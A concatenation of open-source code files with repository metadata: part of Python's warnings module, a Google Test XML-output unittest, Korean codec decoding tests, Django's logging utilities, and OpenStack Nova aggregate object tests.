if a.startswith(action):
return a
raise _OptionError("invalid action: %r" % (action,))
# Helper for _setoption()
def _getcategory(category):
import re
if not category:
return Warning
if re.match("^[a-zA-Z0-9_]+$", category):
try:
cat = eval(category)
except NameError:
raise _OptionError("unknown warning category: %r" % (category,))
else:
i = category.rfind(".")
module = category[:i]
klass = category[i+1:]
try:
m = __import__(module, None, None, [klass])
except ImportError:
raise _OptionError("invalid module name: %r" % (module,))
try:
cat = getattr(m, klass)
except AttributeError:
raise _OptionError("unknown warning category: %r" % (category,))
if not issubclass(cat, Warning):
raise _OptionError("invalid warning category: %r" % (category,))
return cat
# Code typically replaced by _warnings
def warn(message, category=None, stacklevel=1):
"""Issue a warning, or maybe ignore it or raise an exception."""
# Check if message is already a Warning object
if isinstance(message, Warning):
category = message.__class__
# Check category argument
if category is None:
category = UserWarning
assert issubclass(category, Warning)
# Get context information
try:
caller = sys._getframe(stacklevel)
except ValueError:
globals = sys.__dict__
lineno = 1
else:
globals = caller.f_globals
lineno = caller.f_lineno
if '__name__' in globals:
module = globals['__name__']
else:
module = "<string>"
filename = globals.get('__file__')
if filename:
fnl = filename.lower()
if fnl.endswith((".pyc", ".pyo")):
filename = filename[:-1]
else:
if module == "__main__":
try:
filename = sys.argv[0]
except AttributeError:
# embedded interpreters don't have sys.argv, see bug #839151
filename = '__main__'
if not filename:
filename = module
registry = globals.setdefault("__warningregistry__", {})
warn_explicit(message, category, filename, lineno, module, registry,
globals)
def warn_explicit(message, category, filename, lineno,
module=None, registry=None, module_globals=None):
lineno = int(lineno)
if module is None:
module = filename or "<unknown>"
if module[-3:].lower() == ".py":
module = module[:-3] # XXX What about leading pathname?
if registry is None:
registry = {}
if isinstance(message, Warning):
text = str(message)
category = message.__class__
else:
text = message
message = category(message)
key = (text, category, lineno)
# Quick test for common case
if registry.get(key):
return
# Search the filters
for item in filters:
action, msg, cat, mod, ln = item
if ((msg is None or msg.match(text)) and
issubclass(category, cat) and
(mod is None or mod.match(module)) and
(ln == 0 or lineno == ln)):
break
else:
action = defaultaction
# Early exit actions
if action == "ignore":
registry[key] = 1
return
# Prime the linecache for formatting, in case the
# "file" is actually in a zipfile or something.
linecache.getlines(filename, module_globals)
if action == "error":
raise message
# Other actions
if action == "once":
registry[key] = 1
oncekey = (text, category)
if onceregistry.get(oncekey):
return
onceregistry[oncekey] = 1
elif action == "always":
pass
elif action == "module":
registry[key] = 1
altkey = (text, category, 0)
if registry.get(altkey):
return
registry[altkey] = 1
elif action == "default":
registry[key] = 1
else:
# Unrecognized actions are errors
raise RuntimeError(
"Unrecognized action (%r) in warnings.filters:\n %s" %
(action, item))
if not callable(showwarning):
raise TypeError("warnings.showwarning() must be set to a "
"function or method")
# Print message and context
showwarning(message, category, filename, lineno)
class WarningMessage(object):
"""Holds the result of a single showwarning() call."""
_WARNING_DETAILS = ("message", "category", "filename", "lineno", "file",
"line")
def __init__(self, message, category, filename, lineno, file=None,
line=None):
local_values = locals()
for attr in self._WARNING_DETAILS:
setattr(self, attr, local_values[attr])
self._category_name = category.__name__ if category else None
def __str__(self):
return ("{message : %r, category : %r, filename : %r, lineno : %s, "
"line : %r}" % (self.message, self._category_name,
self.filename, self.lineno, self.line))
class catch_warnings(object):
"""A context manager that copies and restores the warnings filter upon
exiting the context.
The 'record' argument specifies whether warnings should be captured by a
custom implementation of warnings.showwarning() and be appended to a list
returned by the context manager. Otherwise None is returned by the context
manager. The objects appended to the list are arguments whose attributes
mirror the arguments to showwarning().
The 'module' argument is to specify an alternative module to the module
named 'warnings' and imported under that name. This argument is only useful
when testing the warnings module itself.
"""
def __init__(self, *, record=False, module=None):
"""Specify whether to record warnings and if an alternative module
should be used other than sys.modules['warnings'].
For compatibility with Python 3.0, please consider all arguments to be
keyword-only.
"""
self._record = record
self._module = sys.modules['warnings'] if module is None else module
self._entered = False
def __repr__(self):
args = []
if self._record:
args.append("record=True")
if self._module is not sys.modules['warnings']:
args.append("module=%r" % self._module)
name = type(self).__name__
return "%s(%s)" % (name, ", ".join(args))
def __enter__(self):
if self._entered:
raise RuntimeError("Cannot enter %r twice" % self)
self._entered = True
self._filters = self._module.filters
self._module.filters = self._filters[:]
self._showwarning = self._module.showwarning
if self._record:
log = []
def showwarning(*args, **kwargs):
log.append(WarningMessage(*args, **kwargs))
self._module.showwarning = showwarning
return log
else:
return None
def __exit__(self, *exc_info):
if not self._entered:
raise RuntimeError("Cannot exit %r without entering first" % self)
self._module.filters = self._filters
self._module.showwarning = self._showwarning
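# Usage sketch:
#   import warnings
#   with warnings.catch_warnings(record=True) as log:
#       warnings.simplefilter('always')
#       warnings.warn('heads up', UserWarning)
#   assert len(log) == 1 and issubclass(log[0].category, UserWarning)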
# filters contains a sequence of filter 5-tuples
# The components of the 5-tuple are:
# - an action: error, ignore, always, default, module, or once
# - a compiled regex that must match the warning message
# - a class representing the warning category
# - a compiled regex that must match the module that is being warned
# - a line number for the line being warned about, or 0 to mean any line
# If either of the compiled regexes is None, it matches anything.
_warnings_defaults = False
try:
from _warnings import (filters, _defaultaction, _onceregistry,
warn, warn_explicit)
defaultaction = _defaultaction
onceregistry = _onceregistry
_warnings_defaults = True
except ImportError:
filters = []
defaultaction = "default"
onceregistry = {}
# Module initialization
_processoptions(sys.warnoptions)
if not _warnings_defaults:
silence = [ImportWarning, PendingDeprecationWarning]
silence.append(DeprecationWarning)
for cls in silence:
simplefilter("ignore", category=cls)
bytes_warning = sys.flags.bytes_warning
if bytes_warning > 1:
bytes_action = "error"
elif bytes_warning:
bytes_action = "default"
else:
bytes_action = "ignore"
simplefilter(bytes_action, category=BytesWarning, append=1)
# resource usage warnings are enabled by default in pydebug mode
if hasattr(sys, 'gettotalrefcount'):
resource_action = "always"
else:
resource_action = "ignore"
simplefilter(resource_action, category=ResourceWarning, append=1)
del _warnings_defaults
|
gpl-3.0
|
hadjian/gtest-1.6.0
|
test/gtest_xml_output_unittest.py
|
397
|
11279
|
#!/usr/bin/env python
#
# Copyright 2006, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit test for the gtest_xml_output module"""
__author__ = '[email protected] (Sean Mcafee)'
import errno
import os
import sys
from xml.dom import minidom, Node
import gtest_test_utils
import gtest_xml_test_utils
GTEST_OUTPUT_FLAG = "--gtest_output"
GTEST_DEFAULT_OUTPUT_FILE = "test_detail.xml"
GTEST_PROGRAM_NAME = "gtest_xml_output_unittest_"
SUPPORTS_STACK_TRACES = False
if SUPPORTS_STACK_TRACES:
STACK_TRACE_TEMPLATE = "\nStack trace:\n*"
else:
STACK_TRACE_TEMPLATE = ""
EXPECTED_NON_EMPTY_XML = """<?xml version="1.0" encoding="UTF-8"?>
<testsuites tests="23" failures="4" disabled="2" errors="0" time="*" name="AllTests">
<testsuite name="SuccessfulTest" tests="1" failures="0" disabled="0" errors="0" time="*">
<testcase name="Succeeds" status="run" time="*" classname="SuccessfulTest"/>
</testsuite>
<testsuite name="FailedTest" tests="1" failures="1" disabled="0" errors="0" time="*">
<testcase name="Fails" status="run" time="*" classname="FailedTest">
<failure message="Value of: 2
Expected: 1" type=""><![CDATA[gtest_xml_output_unittest_.cc:*
Value of: 2
Expected: 1%(stack)s]]></failure>
</testcase>
</testsuite>
<testsuite name="MixedResultTest" tests="3" failures="1" disabled="1" errors="0" time="*">
<testcase name="Succeeds" status="run" time="*" classname="MixedResultTest"/>
<testcase name="Fails" status="run" time="*" classname="MixedResultTest">
<failure message="Value of: 2
Expected: 1" type=""><![CDATA[gtest_xml_output_unittest_.cc:*
Value of: 2
Expected: 1%(stack)s]]></failure>
<failure message="Value of: 3
Expected: 2" type=""><![CDATA[gtest_xml_output_unittest_.cc:*
Value of: 3
Expected: 2%(stack)s]]></failure>
</testcase>
<testcase name="DISABLED_test" status="notrun" time="*" classname="MixedResultTest"/>
</testsuite>
<testsuite name="XmlQuotingTest" tests="1" failures="1" disabled="0" errors="0" time="*">
<testcase name="OutputsCData" status="run" time="*" classname="XmlQuotingTest">
<failure message="Failed
XML output: <?xml encoding="utf-8"><top><![CDATA[cdata text]]></top>" type=""><![CDATA[gtest_xml_output_unittest_.cc:*
Failed
XML output: <?xml encoding="utf-8"><top><![CDATA[cdata text]]>]]><![CDATA[</top>%(stack)s]]></failure>
</testcase>
</testsuite>
<testsuite name="InvalidCharactersTest" tests="1" failures="1" disabled="0" errors="0" time="*">
<testcase name="InvalidCharactersInMessage" status="run" time="*" classname="InvalidCharactersTest">
<failure message="Failed
Invalid characters in brackets []" type=""><![CDATA[gtest_xml_output_unittest_.cc:*
Failed
Invalid characters in brackets []%(stack)s]]></failure>
</testcase>
</testsuite>
<testsuite name="DisabledTest" tests="1" failures="0" disabled="1" errors="0" time="*">
<testcase name="DISABLED_test_not_run" status="notrun" time="*" classname="DisabledTest"/>
</testsuite>
<testsuite name="PropertyRecordingTest" tests="4" failures="0" disabled="0" errors="0" time="*">
<testcase name="OneProperty" status="run" time="*" classname="PropertyRecordingTest" key_1="1"/>
<testcase name="IntValuedProperty" status="run" time="*" classname="PropertyRecordingTest" key_int="1"/>
<testcase name="ThreeProperties" status="run" time="*" classname="PropertyRecordingTest" key_1="1" key_2="2" key_3="3"/>
<testcase name="TwoValuesForOneKeyUsesLastValue" status="run" time="*" classname="PropertyRecordingTest" key_1="2"/>
</testsuite>
<testsuite name="NoFixtureTest" tests="3" failures="0" disabled="0" errors="0" time="*">
<testcase name="RecordProperty" status="run" time="*" classname="NoFixtureTest" key="1"/>
<testcase name="ExternalUtilityThatCallsRecordIntValuedProperty" status="run" time="*" classname="NoFixtureTest" key_for_utility_int="1"/>
<testcase name="ExternalUtilityThatCallsRecordStringValuedProperty" status="run" time="*" classname="NoFixtureTest" key_for_utility_string="1"/>
</testsuite>
<testsuite name="Single/ValueParamTest" tests="4" failures="0" disabled="0" errors="0" time="*">
<testcase name="HasValueParamAttribute/0" value_param="33" status="run" time="*" classname="Single/ValueParamTest" />
<testcase name="HasValueParamAttribute/1" value_param="42" status="run" time="*" classname="Single/ValueParamTest" />
<testcase name="AnotherTestThatHasValueParamAttribute/0" value_param="33" status="run" time="*" classname="Single/ValueParamTest" />
<testcase name="AnotherTestThatHasValueParamAttribute/1" value_param="42" status="run" time="*" classname="Single/ValueParamTest" />
</testsuite>
<testsuite name="TypedTest/0" tests="1" failures="0" disabled="0" errors="0" time="*">
<testcase name="HasTypeParamAttribute" type_param="*" status="run" time="*" classname="TypedTest/0" />
</testsuite>
<testsuite name="TypedTest/1" tests="1" failures="0" disabled="0" errors="0" time="*">
<testcase name="HasTypeParamAttribute" type_param="*" status="run" time="*" classname="TypedTest/1" />
</testsuite>
<testsuite name="Single/TypeParameterizedTestCase/0" tests="1" failures="0" disabled="0" errors="0" time="*">
<testcase name="HasTypeParamAttribute" type_param="*" status="run" time="*" classname="Single/TypeParameterizedTestCase/0" />
</testsuite>
<testsuite name="Single/TypeParameterizedTestCase/1" tests="1" failures="0" disabled="0" errors="0" time="*">
<testcase name="HasTypeParamAttribute" type_param="*" status="run" time="*" classname="Single/TypeParameterizedTestCase/1" />
</testsuite>
</testsuites>""" % {'stack': STACK_TRACE_TEMPLATE}
EXPECTED_EMPTY_XML = """<?xml version="1.0" encoding="UTF-8"?>
<testsuites tests="0" failures="0" disabled="0" errors="0" time="*" name="AllTests">
</testsuites>"""
class GTestXMLOutputUnitTest(gtest_xml_test_utils.GTestXMLTestCase):
"""
Unit test for Google Test's XML output functionality.
"""
def testNonEmptyXmlOutput(self):
"""
Runs a test program that generates a non-empty XML output, and
tests that the XML output is expected.
"""
self._TestXmlOutput(GTEST_PROGRAM_NAME, EXPECTED_NON_EMPTY_XML, 1)
def testEmptyXmlOutput(self):
"""
Runs a test program that generates an empty XML output, and
tests that the XML output is expected.
"""
self._TestXmlOutput("gtest_no_test_unittest",
EXPECTED_EMPTY_XML, 0)
def testDefaultOutputFile(self):
"""
Confirms that Google Test produces an XML output file with the expected
default name if no name is explicitly specified.
"""
output_file = os.path.join(gtest_test_utils.GetTempDir(),
GTEST_DEFAULT_OUTPUT_FILE)
gtest_prog_path = gtest_test_utils.GetTestExecutablePath(
"gtest_no_test_unittest")
try:
os.remove(output_file)
except OSError, e:
if e.errno != errno.ENOENT:
raise
p = gtest_test_utils.Subprocess(
[gtest_prog_path, "%s=xml" % GTEST_OUTPUT_FLAG],
working_dir=gtest_test_utils.GetTempDir())
self.assert_(p.exited)
self.assertEquals(0, p.exit_code)
self.assert_(os.path.isfile(output_file))
def testSuppressedXmlOutput(self):
"""
Tests that no XML file is generated if the default XML listener is
shut down before RUN_ALL_TESTS is invoked.
"""
xml_path = os.path.join(gtest_test_utils.GetTempDir(),
GTEST_PROGRAM_NAME + "out.xml")
if os.path.isfile(xml_path):
os.remove(xml_path)
gtest_prog_path = gtest_test_utils.GetTestExecutablePath(GTEST_PROGRAM_NAME)
command = [gtest_prog_path,
"%s=xml:%s" % (GTEST_OUTPUT_FLAG, xml_path),
"--shut_down_xml"]
p = gtest_test_utils.Subprocess(command)
if p.terminated_by_signal:
self.assert_(False,
"%s was killed by signal %d" % (gtest_prog_name, p.signal))
else:
self.assert_(p.exited)
self.assertEquals(1, p.exit_code,
"'%s' exited with code %s, which doesn't match "
"the expected exit code %s."
% (command, p.exit_code, 1))
self.assert_(not os.path.isfile(xml_path))
def _TestXmlOutput(self, gtest_prog_name, expected_xml, expected_exit_code):
"""
Asserts that the XML document generated by running the program
gtest_prog_name matches expected_xml, a string containing another
XML document. Furthermore, the program's exit code must be
expected_exit_code.
"""
xml_path = os.path.join(gtest_test_utils.GetTempDir(),
gtest_prog_name + "out.xml")
gtest_prog_path = gtest_test_utils.GetTestExecutablePath(gtest_prog_name)
command = [gtest_prog_path, "%s=xml:%s" % (GTEST_OUTPUT_FLAG, xml_path)]
p = gtest_test_utils.Subprocess(command)
if p.terminated_by_signal:
self.assert_(False,
"%s was killed by signal %d" % (gtest_prog_name, p.signal))
else:
self.assert_(p.exited)
self.assertEquals(expected_exit_code, p.exit_code,
"'%s' exited with code %s, which doesn't match "
"the expected exit code %s."
% (command, p.exit_code, expected_exit_code))
expected = minidom.parseString(expected_xml)
actual = minidom.parse(xml_path)
self.NormalizeXml(actual.documentElement)
self.AssertEquivalentNodes(expected.documentElement,
actual.documentElement)
expected.unlink()
    actual.unlink()
if __name__ == '__main__':
os.environ['GTEST_STACK_TRACE_DEPTH'] = '1'
gtest_test_utils.Main()
|
bsd-3-clause
|
p4datasystems/CarnotKEdist
|
dist/Lib/test/test_codecencodings_kr.py
|
149
|
2750
|
#!/usr/bin/env python
#
# test_codecencodings_kr.py
# Codec encoding tests for ROK encodings.
#
from test import test_support
from test import test_multibytecodec_support
import unittest
class Test_CP949(test_multibytecodec_support.TestBase, unittest.TestCase):
encoding = 'cp949'
tstring = test_multibytecodec_support.load_teststring('cp949')
codectests = (
# invalid bytes
("abc\x80\x80\xc1\xc4", "strict", None),
("abc\xc8", "strict", None),
("abc\x80\x80\xc1\xc4", "replace", u"abc\ufffd\uc894"),
("abc\x80\x80\xc1\xc4\xc8", "replace", u"abc\ufffd\uc894\ufffd"),
("abc\x80\x80\xc1\xc4", "ignore", u"abc\uc894"),
)
class Test_EUCKR(test_multibytecodec_support.TestBase, unittest.TestCase):
encoding = 'euc_kr'
tstring = test_multibytecodec_support.load_teststring('euc_kr')
codectests = (
# invalid bytes
("abc\x80\x80\xc1\xc4", "strict", None),
("abc\xc8", "strict", None),
("abc\x80\x80\xc1\xc4", "replace", u"abc\ufffd\uc894"),
("abc\x80\x80\xc1\xc4\xc8", "replace", u"abc\ufffd\uc894\ufffd"),
("abc\x80\x80\xc1\xc4", "ignore", u"abc\uc894"),
# composed make-up sequence errors
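        # (\xa4\xd4 encodes U+3164 HANGUL FILLER, which begins an 8-byte
        # composed make-up sequence; the cases below exercise truncated and
        # corrupted forms of that sequence)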
("\xa4\xd4", "strict", None),
("\xa4\xd4\xa4", "strict", None),
("\xa4\xd4\xa4\xb6", "strict", None),
("\xa4\xd4\xa4\xb6\xa4", "strict", None),
("\xa4\xd4\xa4\xb6\xa4\xd0", "strict", None),
("\xa4\xd4\xa4\xb6\xa4\xd0\xa4", "strict", None),
("\xa4\xd4\xa4\xb6\xa4\xd0\xa4\xd4", "strict", u"\uc4d4"),
("\xa4\xd4\xa4\xb6\xa4\xd0\xa4\xd4x", "strict", u"\uc4d4x"),
("a\xa4\xd4\xa4\xb6\xa4", "replace", u"a\ufffd"),
("\xa4\xd4\xa3\xb6\xa4\xd0\xa4\xd4", "strict", None),
("\xa4\xd4\xa4\xb6\xa3\xd0\xa4\xd4", "strict", None),
("\xa4\xd4\xa4\xb6\xa4\xd0\xa3\xd4", "strict", None),
("\xa4\xd4\xa4\xff\xa4\xd0\xa4\xd4", "replace", u"\ufffd"),
("\xa4\xd4\xa4\xb6\xa4\xff\xa4\xd4", "replace", u"\ufffd"),
("\xa4\xd4\xa4\xb6\xa4\xd0\xa4\xff", "replace", u"\ufffd"),
("\xc1\xc4", "strict", u"\uc894"),
)
class Test_JOHAB(test_multibytecodec_support.TestBase, unittest.TestCase):
encoding = 'johab'
tstring = test_multibytecodec_support.load_teststring('johab')
codectests = (
# invalid bytes
("abc\x80\x80\xc1\xc4", "strict", None),
("abc\xc8", "strict", None),
("abc\x80\x80\xc1\xc4", "replace", u"abc\ufffd\ucd27"),
("abc\x80\x80\xc1\xc4\xc8", "replace", u"abc\ufffd\ucd27\ufffd"),
("abc\x80\x80\xc1\xc4", "ignore", u"abc\ucd27"),
)
def test_main():
test_support.run_unittest(__name__)
if __name__ == "__main__":
test_main()
|
apache-2.0
|
rds0751/colinkers
|
env/Lib/site-packages/django/utils/log.py
|
85
|
6462
|
from __future__ import unicode_literals
import logging
import logging.config # needed when logging_config doesn't start with logging.config
from copy import copy
from django.conf import settings
from django.core import mail
from django.core.mail import get_connection
from django.core.management.color import color_style
from django.utils.module_loading import import_string
from django.views.debug import ExceptionReporter
# Default logging for Django. This sends an email to the site admins on every
# HTTP 500 error. Depending on DEBUG, all other log records are either sent to
# the console (DEBUG=True) or discarded (DEBUG=False) by means of the
# require_debug_true filter.
DEFAULT_LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse',
},
'require_debug_true': {
'()': 'django.utils.log.RequireDebugTrue',
},
},
'formatters': {
'django.server': {
'()': 'django.utils.log.ServerFormatter',
'format': '[%(server_time)s] %(message)s',
}
},
'handlers': {
'console': {
'level': 'INFO',
'filters': ['require_debug_true'],
'class': 'logging.StreamHandler',
},
'django.server': {
'level': 'INFO',
'class': 'logging.StreamHandler',
'formatter': 'django.server',
},
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django': {
'handlers': ['console', 'mail_admins'],
'level': 'INFO',
},
'django.server': {
'handlers': ['django.server'],
'level': 'INFO',
'propagate': False,
},
}
}
def configure_logging(logging_config, logging_settings):
if logging_config:
# First find the logging configuration function ...
logging_config_func = import_string(logging_config)
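        # Apply Django's defaults first; the user-supplied function runs below
        # and can extend or override them.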
logging.config.dictConfig(DEFAULT_LOGGING)
# ... then invoke it with the logging settings
if logging_settings:
logging_config_func(logging_settings)
class AdminEmailHandler(logging.Handler):
"""An exception log handler that emails log entries to site admins.
If the request is passed as the first argument to the log record,
request data will be provided in the email report.
"""
def __init__(self, include_html=False, email_backend=None):
logging.Handler.__init__(self)
self.include_html = include_html
self.email_backend = email_backend
def emit(self, record):
try:
request = record.request
subject = '%s (%s IP): %s' % (
record.levelname,
('internal' if request.META.get('REMOTE_ADDR') in settings.INTERNAL_IPS
else 'EXTERNAL'),
record.getMessage()
)
except Exception:
subject = '%s: %s' % (
record.levelname,
record.getMessage()
)
request = None
subject = self.format_subject(subject)
# Since we add a nicely formatted traceback on our own, create a copy
# of the log record without the exception data.
no_exc_record = copy(record)
no_exc_record.exc_info = None
no_exc_record.exc_text = None
if record.exc_info:
exc_info = record.exc_info
else:
exc_info = (None, record.getMessage(), None)
reporter = ExceptionReporter(request, is_email=True, *exc_info)
message = "%s\n\n%s" % (self.format(no_exc_record), reporter.get_traceback_text())
html_message = reporter.get_traceback_html() if self.include_html else None
self.send_mail(subject, message, fail_silently=True, html_message=html_message)
def send_mail(self, subject, message, *args, **kwargs):
mail.mail_admins(subject, message, *args, connection=self.connection(), **kwargs)
def connection(self):
return get_connection(backend=self.email_backend, fail_silently=True)
def format_subject(self, subject):
"""
Escape CR and LF characters.
"""
return subject.replace('\n', '\\n').replace('\r', '\\r')
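# A minimal sketch (illustrative only, not part of Django) of wiring
# AdminEmailHandler into a project's LOGGING setting; dictConfig passes the
# extra 'include_html' key as a keyword argument to the handler constructor.
EXAMPLE_ADMIN_EMAIL_LOGGING = {
    'version': 1,
    'disable_existing_loggers': False,
    'handlers': {
        'mail_admins': {
            'level': 'ERROR',
            'class': 'django.utils.log.AdminEmailHandler',
            'include_html': True,
        },
    },
    'loggers': {
        'django': {'handlers': ['mail_admins'], 'level': 'ERROR'},
    },
}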
class CallbackFilter(logging.Filter):
"""
A logging filter that checks the return value of a given callable (which
takes the record-to-be-logged as its only parameter) to decide whether to
log a record.
"""
def __init__(self, callback):
self.callback = callback
def filter(self, record):
if self.callback(record):
return 1
return 0
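# Illustrative example (hypothetical predicate, not part of Django): a filter
# instance that drops any record whose formatted message mentions 'healthcheck'.
example_skip_healthchecks = CallbackFilter(
    lambda record: 'healthcheck' not in record.getMessage())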
class RequireDebugFalse(logging.Filter):
def filter(self, record):
return not settings.DEBUG
class RequireDebugTrue(logging.Filter):
def filter(self, record):
return settings.DEBUG
class ServerFormatter(logging.Formatter):
def __init__(self, *args, **kwargs):
self.style = color_style()
super(ServerFormatter, self).__init__(*args, **kwargs)
def format(self, record):
msg = record.msg
status_code = getattr(record, 'status_code', None)
if status_code:
if 200 <= status_code < 300:
# Put 2XX first, since it should be the common case
msg = self.style.HTTP_SUCCESS(msg)
elif 100 <= status_code < 200:
msg = self.style.HTTP_INFO(msg)
elif status_code == 304:
msg = self.style.HTTP_NOT_MODIFIED(msg)
elif 300 <= status_code < 400:
msg = self.style.HTTP_REDIRECT(msg)
elif status_code == 404:
msg = self.style.HTTP_NOT_FOUND(msg)
elif 400 <= status_code < 500:
msg = self.style.HTTP_BAD_REQUEST(msg)
else:
# Any 5XX, or any other status code
msg = self.style.HTTP_SERVER_ERROR(msg)
if self.uses_server_time() and not hasattr(record, 'server_time'):
record.server_time = self.formatTime(record, self.datefmt)
record.msg = msg
return super(ServerFormatter, self).format(record)
def uses_server_time(self):
return self._fmt.find('%(server_time)') >= 0
|
agpl-3.0
|
eonpatapon/nova
|
nova/tests/unit/objects/test_aggregate.py
|
30
|
7793
|
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_utils import timeutils
from nova import db
from nova import exception
from nova.objects import aggregate
from nova.tests.unit import fake_notifier
from nova.tests.unit.objects import test_objects
NOW = timeutils.utcnow().replace(microsecond=0)
fake_aggregate = {
'created_at': NOW,
'updated_at': None,
'deleted_at': None,
'deleted': False,
'id': 123,
'name': 'fake-aggregate',
'hosts': ['foo', 'bar'],
'metadetails': {'this': 'that'},
}
SUBS = {'metadata': 'metadetails'}
class _TestAggregateObject(object):
def test_get_by_id(self):
self.mox.StubOutWithMock(db, 'aggregate_get')
db.aggregate_get(self.context, 123).AndReturn(fake_aggregate)
self.mox.ReplayAll()
agg = aggregate.Aggregate.get_by_id(self.context, 123)
self.compare_obj(agg, fake_aggregate, subs=SUBS)
def test_create(self):
self.mox.StubOutWithMock(db, 'aggregate_create')
db.aggregate_create(self.context, {'name': 'foo'},
metadata={'one': 'two'}).AndReturn(fake_aggregate)
self.mox.ReplayAll()
agg = aggregate.Aggregate(context=self.context)
agg.name = 'foo'
agg.metadata = {'one': 'two'}
agg.create()
self.compare_obj(agg, fake_aggregate, subs=SUBS)
def test_recreate_fails(self):
self.mox.StubOutWithMock(db, 'aggregate_create')
db.aggregate_create(self.context, {'name': 'foo'},
metadata={'one': 'two'}).AndReturn(fake_aggregate)
self.mox.ReplayAll()
agg = aggregate.Aggregate(context=self.context)
agg.name = 'foo'
agg.metadata = {'one': 'two'}
agg.create()
self.assertRaises(exception.ObjectActionError, agg.create,
self.context)
def test_save(self):
self.mox.StubOutWithMock(db, 'aggregate_update')
db.aggregate_update(self.context, 123, {'name': 'baz'}).AndReturn(
fake_aggregate)
self.mox.ReplayAll()
agg = aggregate.Aggregate(context=self.context)
agg.id = 123
agg.name = 'baz'
agg.save()
self.compare_obj(agg, fake_aggregate, subs=SUBS)
def test_save_and_create_no_hosts(self):
agg = aggregate.Aggregate()
agg.id = 123
agg.hosts = ['foo', 'bar']
self.assertRaises(exception.ObjectActionError,
agg.create, self.context)
self.assertRaises(exception.ObjectActionError,
agg.save, self.context)
def test_update_metadata(self):
self.mox.StubOutWithMock(db, 'aggregate_metadata_delete')
self.mox.StubOutWithMock(db, 'aggregate_metadata_add')
db.aggregate_metadata_delete(self.context, 123, 'todelete')
db.aggregate_metadata_add(self.context, 123, {'toadd': 'myval'})
self.mox.ReplayAll()
fake_notifier.NOTIFICATIONS = []
agg = aggregate.Aggregate()
agg._context = self.context
agg.id = 123
agg.metadata = {'foo': 'bar'}
agg.obj_reset_changes()
agg.update_metadata({'todelete': None, 'toadd': 'myval'})
self.assertEqual(2, len(fake_notifier.NOTIFICATIONS))
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEqual('aggregate.updatemetadata.start', msg.event_type)
self.assertEqual({'todelete': None, 'toadd': 'myval'},
msg.payload['meta_data'])
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEqual('aggregate.updatemetadata.end', msg.event_type)
self.assertEqual({'todelete': None, 'toadd': 'myval'},
msg.payload['meta_data'])
self.assertEqual({'foo': 'bar', 'toadd': 'myval'}, agg.metadata)
def test_destroy(self):
self.mox.StubOutWithMock(db, 'aggregate_delete')
db.aggregate_delete(self.context, 123)
self.mox.ReplayAll()
agg = aggregate.Aggregate(context=self.context)
agg.id = 123
agg.destroy()
def test_add_host(self):
self.mox.StubOutWithMock(db, 'aggregate_host_add')
db.aggregate_host_add(self.context, 123, 'bar'
).AndReturn({'host': 'bar'})
self.mox.ReplayAll()
agg = aggregate.Aggregate()
agg.id = 123
agg.hosts = ['foo']
agg._context = self.context
agg.add_host('bar')
self.assertEqual(agg.hosts, ['foo', 'bar'])
def test_delete_host(self):
self.mox.StubOutWithMock(db, 'aggregate_host_delete')
db.aggregate_host_delete(self.context, 123, 'foo')
self.mox.ReplayAll()
agg = aggregate.Aggregate()
agg.id = 123
agg.hosts = ['foo', 'bar']
agg._context = self.context
agg.delete_host('foo')
self.assertEqual(agg.hosts, ['bar'])
def test_availability_zone(self):
agg = aggregate.Aggregate()
agg.metadata = {'availability_zone': 'foo'}
self.assertEqual('foo', agg.availability_zone)
def test_get_all(self):
self.mox.StubOutWithMock(db, 'aggregate_get_all')
db.aggregate_get_all(self.context).AndReturn([fake_aggregate])
self.mox.ReplayAll()
aggs = aggregate.AggregateList.get_all(self.context)
self.assertEqual(1, len(aggs))
self.compare_obj(aggs[0], fake_aggregate, subs=SUBS)
def test_by_host(self):
self.mox.StubOutWithMock(db, 'aggregate_get_by_host')
db.aggregate_get_by_host(self.context, 'fake-host', key=None,
).AndReturn([fake_aggregate])
self.mox.ReplayAll()
aggs = aggregate.AggregateList.get_by_host(self.context, 'fake-host')
self.assertEqual(1, len(aggs))
self.compare_obj(aggs[0], fake_aggregate, subs=SUBS)
@mock.patch('nova.db.aggregate_get_by_metadata_key')
def test_get_by_metadata_key(self, get_by_metadata_key):
get_by_metadata_key.return_value = [fake_aggregate]
aggs = aggregate.AggregateList.get_by_metadata_key(
self.context, 'this')
self.assertEqual(1, len(aggs))
self.compare_obj(aggs[0], fake_aggregate, subs=SUBS)
